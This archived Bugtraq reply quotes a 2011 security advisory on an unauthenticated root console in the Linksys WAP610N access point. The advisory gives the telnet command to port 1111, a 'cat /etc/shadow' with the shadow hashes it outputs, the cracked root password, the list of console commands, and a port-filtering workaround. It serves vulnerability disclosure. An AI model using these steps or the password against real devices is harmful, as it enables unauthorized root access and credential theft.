lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-Id: <201102142147.40182.matteo.ignaccolo@securenetwork.it>
Date: Mon, 14 Feb 2011 21:47:39 +0100
From: Matteo Ignaccolo <matteo.ignaccolo@...urenetwork.it>
To: bugtraq@...urityfocus.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Linksys WAP610N Unauthenticated Root Console

The correct public disclosure date is 10/02/2011


In data Thursday 10 February 2011 00:12:10, Matteo Ignaccolo ha scritto:
> Secure Network - Security Research Advisory
> 
> Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges
> Systems affected: WAP610N (Firmware Version: 1.0.01)
> Systems not affected: --
> Severity: High
> Local/Remote: Remote
> Vendor URL: http://www.linksysbycisco.com
> Author(s): Matteo Ignaccolo m.ignaccolo@...urenetwork.it
> Vendor disclosure: 14/06/2010
> Vendor acknowledged: 14/06/2010
> Vendor bugfix: 14/12/2010 (reply to our request for update)
> Vendor patch release: ??
> Public disclosure: 10/02/2010
> Advisory number: SN-2010-08
> Advisory URL:
> http://www.securenetwork.it/ricerca/advisory/download/SN-2010-08.txt
> 
> 
> *** SUMMARY ***
> 
> Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft.
> 
> Unauthenticated remote textual administration console has been found that
> allow an attacker to run system command as root user.
> 
> 
> *** VULNERABILITY DETAILS ***
> 
> telnet <access-point IP> 1111
> 
> Command> system id
> Output>  uid=0(root) gid=0(root)
> 
> Coomand> system cat /etc/shadow
> Ouptup>  root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7:::
> Ouptup>  bin:*:10933:0:99999:7:::
> Ouptup>  daemon:*:10933:0:99999:7:::
> Ouptup>  adm:*:10933:0:99999:7:::
> Ouptup>  lp:*:10933:0:99999:7:::
> Ouptup>  sync:*:10933:0:99999:7:::
> Ouptup>  shutdown:*:10933:0:99999:7:::
> Ouptup>  halt:*:10933:0:99999:7:::
> Ouptup>  uucp:*:10933
> 
> root password is "wlan" (cracked with MDcrack http://mdcrack.openwall.net)
> 
> List of console's command:
> 
> ATHENA_READ
> ATHENA_WRITE
> CHIPVAR_GET
> DEBUGTABLE
> DITEM
> DMEM
> DREG16
> DREG32
> DREG8
> DRV_CAT_FREE
> DRV_CAT_INIT
> DRV_NAME_GET
> DRV_VAL_GET
> DRV_VAL_SET
> EXIT
> GENIOCTL
> GETMIB
> HELP
> HYP_READ
> HYP_WRITE
> HYP_WRITEBUFFER
> ITEM16
> ITEM32
> ITEM8
> ITEMLIST
> MACCALIBRATE
> MACVARGET
> MACVARSET
> MEM_READ
> MEM_WRITE
> MTAPI
> PITEMLIST
> PRINT_LEVEL
> PROM_READ
> PROM_WRITE
> READ_FILE
> REBOOT
> RECONF
> RG_CONF_GET
> RG_CONF_SET
> RG_SHELL
> SETMIB
> SHELL
> STR_READ
> STR_WRITE
> SYSTEM
> TEST32
> TFTP_GET
> TFTP_PUT
> VER
> 
> 
> *** EXPLOIT ***
> 
> Attackers may exploit these issues through a common telnet client as
> explained above.
> 
> 
> *** FIX INFORMATION ***
> 
> No patch is available.
> 
> *** WORKAROUNDS ***
> 
> Put access points on separate wired network and filter network traffic
> to/from 1111 tcp port.
> 
> 
> *********************
> *** LEGAL NOTICES ***
> *********************
> 
> Secure Network (www.securenetwork.it) is an information security company,
> which provides consulting and training services, and engages in security
> research and development.
> 
> We are committed to open, full disclosure of vulnerabilities, cooperating
> whenever possible with software developers for properly handling
> disclosure.
> 
> This advisory is copyright 2009 Secure Network S.r.l. Permission is
> hereby granted for the redistribution of this alert, provided that it is
> not altered except by reformatting it, and that due credit is given. It
> may not be edited in any way without the express consent of Secure Network
> S.r.l. Permission is explicitly given for insertion in vulnerability
> databases and similars, provided that due credit is given to Secure
> Network.
> 
> The information in the advisory is believed to be accurate at the time of
> publishing based on currently available information. This information is
> provided as-is, as a free service to the community by Secure Network
> research staff. There are no warranties with regard to this information.
> Secure Network does not accept any liability for any direct, indirect,
> or consequential loss or damage arising from use of, or reliance on,
> this information.
> 
> If you have any comments or inquiries, or any issue with what is reported
> in this advisory, please inform us as soon as possible.
> 
> E-mail: securenetwork@...urenetwork.it
> GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
> Phone: +39 02 24 12 67 88

-- 
Dott. Ing. Matteo Ignaccolo

Secure Network S.r.l.
Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia
Tel: +39 02.24126788 Mobile: +39 335.1778376
email: m.ignaccolo@...urenetwork.it
web: www.securenetwork.it

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ